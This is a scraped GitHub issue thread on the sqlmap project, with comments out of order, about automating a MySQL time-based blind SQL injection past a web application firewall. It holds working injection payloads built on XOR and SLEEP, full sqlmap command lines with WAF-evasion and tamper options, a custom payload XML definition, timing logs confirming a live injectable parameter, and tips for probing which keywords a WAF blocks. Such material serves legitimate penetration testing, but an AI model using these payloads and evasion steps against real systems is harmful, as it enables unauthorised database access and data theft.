Closed adon90 closed 4 years ago
Apparently I have solved my doubt, it works with:
``sqlmap -r sqli.txt --skip-waf --random-agent --level 1 --risk 1 --dbms=mysql --suffix="'" --proxy=http://10.113.90.93:8080 --technique=T --batch```` The thing is that specific application crashed when trying:
' XOR(if(12=39,sleep(5),0))OR'` (Conditions with numbers, when if(now()=sysdate(), it doesn't crash).
Regards ;)
If from is blocked, you'll have a bad time with sqlmap. Hence, I am not sure that you'll accomplish anything with that new payload, other than satisfy your curiosity. Anyway, closing this down as there is nothing further (from my side) to be done here
Apparently I have solved my doubt, it works with:
``sqlmap -r sqli.txt --skip-waf --random-agent --level 1 --risk 1 --dbms=mysql --suffix="'" --proxy=http://10.113.90.93:8080 --technique=T --batch```` The thing is that specific application crashed when trying:
' XOR(if(12=39,sleep(5),0))OR'` (Conditions with numbers, when if(now()=sysdate(), it doesn't crash). Regards ;)
have some problem on some payload when i add --suffix="'"
[13:14:52]### [INFO] GET parameter 'strName' appears to be 'MySQL >= 5.0.12 A ND time-based blind (query SLEEP - comment)' injectable [13:14:52] [INFO] checking if the injection point on GET parameter 'strName' is a false positive [13:14:52] [WARNING] false positive or unexploitable injection point detected [13:14:52]### [WARNING] GET parameter 'strName' does not seem to be injectabl e [13:14:52] [CRITICAL] all tested parameters do not appear to be injectable. Reru n without providing the option '--technique'. If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could try to use opti on '--tamper' (e.g. '--tamper=space2comment')
[*] ending @ 13:14:52 /2020-05-06/
@maloba1 @stamparm @adon90 I have the same issue. How can I know if FROM
is blocked or not? if not blocked, how can I benefit from that?
@muslimomar it should be pretty simple. use a random GET parameter (e.g. foobar
) and try different values inside (e.g. ?foobar=SELECT * FROM information_schema.tables WHERE id>1
). spotting differences in responses between different values you'll be able to recognize what WAF blocks and what not (Note: WAF doesn't know what goes into the database and what not, thus, you can do this kind of "testing" anywhere in request)
@adon90 Thank you for your research.
I've been struggling with such payloads (from Acunetix WVS) and sqlmap for a while, but thanks to you I've got it finally working.
To anyone who's interested on how to make sqlmap working with "'XOR(if(now()=sysdate(),sleep(10),0))OR'" or "'XOR(if(now()=sysdate(),sleep(10),0))XOR'" payloads:
<test>
<title>MySQL >= 5.0.12 SINGLE QUOTES XOR time-based blind (query SLEEP)</title>
<stype>5</stype>
<level>1</level>
<risk>1</risk>
<clause>1,2,3,8,9</clause>
<where>1</where>
<vector>%27XOR(IF([INFERENCE],SLEEP([SLEEPTIME]),0))XOR%27Z</vector>
<request>
<payload>%27XOR(IF(NOW()=SYSDATE(),SLEEP([SLEEPTIME]),0))XOR%27Z</payload>
</request>
<response>
<time>[SLEEPTIME]</time>
</response>
<details>
<dbms>MySQL</dbms>
<dbms_version>>= 5.0.12</dbms_version>
</details>
</test>
sqlmap -u "https://test.site.com/path?id=0" -p "id" --method=GET --random-agent --risk=3 --level=5 --dbms=mysql --technique=T --tamper=between,space2comment --time-sec=5
--dbms=mysql --technique=T --tamper=between,space2comment - this is the most important part, you are free to play with the rest of the params.
https://test.site.com/path?id=0%27XOR(if(now()=sysdate()%2Csleep(0)%2C0))XOR%27Z - it should take 0+ secs to complete https://test.site.com/path?id=0%27XOR(if(now()=sysdate()%2Csleep(10)%2C0))XOR%27Z - it should take 10+ secs to complete
Dear @stamparm, hello! Thank you for answering, and help.
Can you plz add such types of payloads in T technique? Or maybe add C technique - which will use custom_injections.xml where user can test his own payloads.
I also encontured same problem Tests performed:
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z => 15.439
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z => 16.556
0'XOR(if(now()=sysdate(),sleep(0),0))XOR'Z => 0.396
0'XOR(if(now()=sysdate(),sleep(3),0))XOR'Z => 3.503
0'XOR(if(now()=sysdate(),sleep(6),0))XOR'Z => 7.465
0'XOR(if(now()=sysdate(),sleep(0),0))XOR'Z => 1.307
0'XOR(if(now()=sysdate(),sleep(6),0))XOR'Z => 6.645
manually is confimed too..
https://github.com/sqlmapproject/sqlmap/issues/5034 same thing https://github.com/sqlmapproject/sqlmap/issues/4910 same) https://github.com/sqlmapproject/sqlmap/issues/4433 and etc https://github.com/sqlmapproject/sqlmap/issues/3456 And here you recomended to manually change payloads xml file. I was try - but seems not correct for that types of payloads.
suffix and prefix here will not work, also need to manually put 0 data in parameter to made it .
In comment up , Andrew made one, but he manually post 0 data , what can interference with other payloads, maybe, not shure. If it can be automatize - cool.
Thanks a lot.
Hello, I have happened to find a vulnerable parameter with this payload: 'XOR(if(now()=sysdate(),sleep(10),0))OR'
I haven't been able to automate this with sqlmap, because it seem that payload is not included in: /usr/share/sqlmap/data/xml/payloads/time-based.xml
How can I automate that?
In the payloads I have not seen anyone starting or ending by ', it seems it does it by default, I have thought about adding --suffix="'" since it needs it to be exploitable
This is my suggestion, to include this payload in the /usr/share/sqlmap/data/xml/payloads/time-based.xml file.
Is it right?
The WAF doesn't allow using the word FROM. Regards, adon90